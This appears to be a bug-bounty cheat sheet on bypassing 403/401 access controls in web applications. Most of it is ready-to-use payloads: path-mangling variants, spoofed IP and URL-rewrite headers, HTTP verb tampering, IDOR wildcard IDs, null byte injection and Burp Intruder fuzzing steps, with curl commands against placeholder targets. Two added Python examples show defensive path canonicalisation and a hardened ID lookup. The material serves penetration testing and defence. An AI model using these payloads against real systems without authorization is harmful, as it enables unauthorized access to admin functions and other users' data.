Bypass 403 / 401
Various bypass tricks and tools
/admin -> 403 or 302
/Admin
/AdMin
/admin/
/admin/.
//admin//
/.;/admin
/./admin/..
/admin.json
/;/admin
//;//admin
/admi%6e [the n is URL-encoded as %6e]
/%2e/admin
/admin#
/admin;/
/admin/~
/./admin/./
/admin?param
/admin..;/
/admin%20
/admin%09
/admin/..;/
/static../admin.jsp
/../admin
/..;/admin
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
curl -i https://target.com/admin -H "X-Original-URL: /admin"
curl -i https://target.com/admin -X POST -H "X-Custom-IP-Authorization: 127.0.0.1"


Capitalize the path
A request to /ADMIN/DELETEUSER may still be mapped to /admin/deleteUser.
curl https://example.com/AdMiN
Add Suffix
curl https://example.com/admin.json
PUT /my_day/jobs/4 HTTP/2 = 403
PUT /my_day/jobs/4.json HTTP/2 = 200 OK
URL encoding
# Try %2e%2e%2f (../) or %20 (space)
curl -g --path-as-is "https://example.com/%2e%2e/admin"
Spring framework
If the Spring framework has the useSuffixPatternMatch option enabled, a request to /admin/deleteUser.anything still matches the /admin/deleteUser pattern.
Prior to Spring 5.3, this option is enabled by default.
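Most of the path variants listed above, the suffix trick, and the Spring suffix matching work because the access rule is evaluated on a different spelling of the path than the one the backend routes on. The following canonicaliser is an added example (not code from the original cheat sheet) that folds those spellings into one form before the rule is applied; the /admin prefix and the Tomcat/Spring-style parsing rules (";param" stripping, dot-segment resolution, suffix-insensitive matching, IIS-style trailing-dot stripping) are assumptions for the illustration.

```python
import posixpath
from urllib.parse import unquote

PROTECTED_PREFIXES = ("/admin",)   # assumed: the route the access rule guards

def canonical_path(raw: str) -> str:
    """Reduce a raw request-target to one canonical absolute path."""
    path = raw.split("#", 1)[0].split("?", 1)[0]      # fragment and query never reach routing
    path = path.replace("\\", "/")                     # backslash accepted as a separator
    for _ in range(3):                                 # bounded decode also covers double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]                     # ';param' is dropped by servlet containers
        seg = seg.rstrip(" \t")                        # trailing %20 / %09
        if seg.strip("."):                             # trailing dots (IIS-style), but keep '.' and '..'
            seg = seg.rstrip(".")
        if seg:                                        # empty segments come from '//'
            segments.append(seg)
    path = posixpath.normpath("/" + "/".join(segments))  # resolves '.' and '..' (never above root)
    return path.lower()

def is_protected(raw: str) -> bool:
    """Apply the access rule to the canonical form, ignoring a file-style suffix
    on the last segment the way suffix pattern matching does (/admin.json -> /admin)."""
    path = canonical_path(raw)
    head, _, last = path.rpartition("/")
    stem = last.split(".", 1)[0]
    if stem:
        path = f"{head}/{stem}"
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)
```

Variants such as /admin/..;/ canonicalise to the parent path rather than to /admin; they only pay off when the proxy and the backend disagree, which is exactly the disagreement a shared canonical form removes.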
API - IDOR
/api/67898555007/users -> 403
/api//users
/api\\users
/api/v1/user/id -> 403
/api/v1/user/id.json
/api/v1/user/id?
/api/v1/user/id/
/api/v2/user/id
/api/v1/user/id&accountdetail
/api/v1/user/yourid&victimid
X-Original-Url: /api/v1/user/id
Send a wildcard (*, %, ., _) instead of an ID; some backends respond with the data of all users.
GET /api/users/* HTTP/1.1
GET /api/users/% HTTP/1.1
GET /api/users/_ HTTP/1.1
GET /api/users/. HTTP/1.1
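The wildcard behaviour above typically comes from a lookup that hands the path segment to a LIKE (or pattern) comparison, where % and _ are wildcards. The following is an added example (not code from the original cheat sheet) showing that weak lookup beside a hardened one that validates the ID, compares with = and enforces ownership; the SQLite schema and rows are constructed for the demonstration.

```python
import re
import sqlite3

ID_PATTERN = re.compile(r"[1-9][0-9]{0,17}")   # canonical positive integer, ASCII digits only

def make_db() -> sqlite3.Connection:
    """Constructed users table for the demonstration."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [(1, "alice@example.test"), (2, "bob@example.test"), (3, "carol@example.test")])
    return con

def lookup_like(con, raw_id: str) -> list:
    """Weak pattern: the path segment is passed to LIKE, so '%' and '_' act as wildcards
    and return every row even though the query is parameterised."""
    return con.execute("SELECT id, email FROM users WHERE id LIKE ?", (raw_id,)).fetchall()

def lookup_strict(con, raw_id: str, requester_id: int) -> list:
    """Hardened: accept only a canonical integer, compare with '=', and check ownership."""
    if not ID_PATTERN.fullmatch(raw_id):
        return []                                   # '*', '%', '_', '.', '', '007' rejected here
    user_id = int(raw_id)
    if user_id != requester_id:
        return []                                   # the IDOR check: only the caller's own record
    return con.execute("SELECT id, email FROM users WHERE id = ?", (user_id,)).fetchall()
```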
Git
If /.git/ returns 403, /.git/config might still return 200!
Wordpress
The X-Rewrite-Url header can be used to bypass WordPress 403 pages.
POST /xmlrpc HTTP/1.1
Host: blah.com
X-Rewrite-Url: xmlrpc.php
X-Rewrite-Url: wp-json/v2/users
X-Rewrite-Url: wp-login.php
Burp Extensions - 403 Bypasser

HTTP Verb Tampering
Change the request method from GET to TRACE, etc.
curl -X TRACE https://example.com/admin --path-as-is

GET /admin HTTP/1.1
Host: target.com
Change the method like this:
POST /admin HTTP/1.1
Host: target.com
If the application supports a method override header, you can also test like this:
POST /admin HTTP/1.1
Host: target.com
X-http-method-override: GET
Or
X-http-override: GET
Fuzz
· /FUZZ/admin
· /admin/FUZZ
· /adminFUZZ
Payload List
Set Up Burp Suite Intruder:
Open Burp Suite and navigate to the Intruder tab.
Send your request to Intruder by right-clicking on it in the Proxy tab and selecting Send to Intruder.
Configure the Intruder positions by selecting the directory or path you want to bypass.
Load the Payloads:
Copy the payloads from the provided wordlist.
Paste the payloads into the Payload Options input field in the Intruder tab.
Payload Processing:
Below the Payload Options section, locate the Payload Processing tool.
Click the Add button to open a new window.
Select the rule Replace String.
Replace the placeholder {base} with the base value you want to use for bypassing.
Disable URL Encoding:
Uncheck the option URL-encode these characters to ensure the payloads are not altered.
Start the Attack:
Click Start Attack and observe the results.
Look for requests that return a 200 status code, indicating a successful bypass.

Content-Length:0
curl -X POST -H "Content-Length: 0" https://www.redacted.com
403 Header Bypass
curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/admin
curl -H "Referer: https://example.com" https://example.com/restricted
curl -H "X-Original-URL: /admin" https://example.com/404
curl -H "X-Rewrite-URL: /admin" https://example.com/404
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
Parameter Tampering
curl "https://example.com/admin?unused_param=1"
curl "https://example.com/admin?redirect=allowed"
Secret Trick: Override parameters with conflicting values:
curl "https://example.com/admin?admin=false&admin=true"
Null Byte Injection
curl --path-as-is "https://example.com/admin.php%00.html"
HTTP Version Downgrade
curl --http1.0 https://example.com/admin
Bypass Origin
Tools
Go-recon - gr-403:
# byp4xx $TARGET
Resources
Interesting Books
The Web Application Hacker's Handbook: the go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities: learn how to perform reconnaissance on a target, identify vulnerabilities, and exploit them.
Real-World Bug Hunting: A Field Guide to Web Hacking: learn about the most common types of bugs, like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.